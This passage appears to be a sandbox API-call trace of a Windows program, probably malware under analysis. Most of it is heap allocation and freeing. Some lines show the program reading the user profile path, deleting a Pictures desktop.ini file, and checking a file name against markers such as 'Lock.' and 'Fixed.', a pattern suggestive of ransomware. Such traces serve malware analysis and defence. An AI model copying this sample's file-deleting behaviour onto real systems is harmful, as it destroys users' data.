[0249.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0249.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0249.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0249.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0249.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0249.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51328 [0249.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51370 [0249.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513a0 [0249.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0249.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0249.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0249.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0249.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0249.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0249.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0249.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0249.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0249.224] CloseHandle (hObject=0x2d0) returned 1 [0249.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0249.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0249.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0249.231] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0249.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0249.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0249.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0249.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0249.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0249.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0249.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0249.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0249.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0249.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0249.253] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55dc0 | out: hHeap=0x970000) returned 1 [0249.254] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0249.255] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0249.255] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0249.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0249.255] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x24 [0249.256] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini")) returned 0x26 [0249.256] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87250 [0249.256] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini")) returned 1 [0249.298] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x44053085, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44053085, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x1, dwReserved1=0x1c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0249.299] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0249.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0249.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0249.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0249.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0249.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0249.299] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0249.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0249.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.299] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0249.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0249.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0249.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0249.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0249.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0249.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0249.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0249.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0249.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0249.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0249.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4a) returned 0x2e58910 [0249.301] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x24 [0249.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0249.301] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini")) returned 0xffffffff [0249.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0249.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0249.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0249.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0249.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0249.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0249.301] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0249.301] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.301] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0249.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0249.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0249.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0249.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0249.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0249.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0249.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0249.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0249.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0249.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0249.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0249.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k1wdGB_YAwU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1wdGB_YAwU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wdGB_YAwU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dGB_YAwU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GB_YAwU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B_YAwU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_YAwU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YAwU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AwU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.302] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wU14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="14UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0249.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UY.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.303] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0249.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0249.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0249.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0249.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0249.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0249.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0249.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0249.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0249.303] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0249.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0249.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0249.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0249.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0249.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0249.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0249.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0249.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0249.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x28) returned 0x977ae8 [0249.304] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0249.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k1wdGB_YAwU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1wdGB_YAwU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wdGB_YAwU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dGB_YAwU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GB_YAwU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B_YAwU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.304] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_YAwU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YAwU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AwU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wU14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="14UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0249.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UY.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0249.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0249.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0249.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 